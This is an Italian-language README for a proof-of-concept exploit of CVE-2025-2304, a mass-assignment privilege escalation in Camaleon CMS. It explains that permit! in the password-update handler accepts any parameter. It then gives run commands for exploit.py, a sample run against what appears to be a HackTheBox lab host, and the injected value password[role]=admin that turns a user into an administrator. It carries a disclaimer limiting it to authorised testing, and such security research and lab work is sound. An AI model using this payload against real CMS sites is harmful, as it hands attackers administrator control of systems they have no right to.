
PoC per CVE-2025-2304 Escalation dei privilegi in Camaleon CMS
Camaleon CMS vulnerabile a escalation dei privilegi tramite Mass Assignment
Esiste un'escalation dei privilegi tramite Mass Assignment in Camaleon CMS
Quando un utente desidera cambiare la propria password, viene chiamato il metodo 'updated_ajax' di UsersController. La vulnerabilità deriva dall'uso del pericoloso metodo permit!, che permette il passaggio di tutti i parametri senza alcun filtraggio.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - URL di base dell'applicazione vulnerabile-u - Nome utente per l'autenticazione-p - Password per l'autenticazionepython exploit.py --url http://facts.htb -u krrish -p krrish
Output:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=admin iniettatoQuesto strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.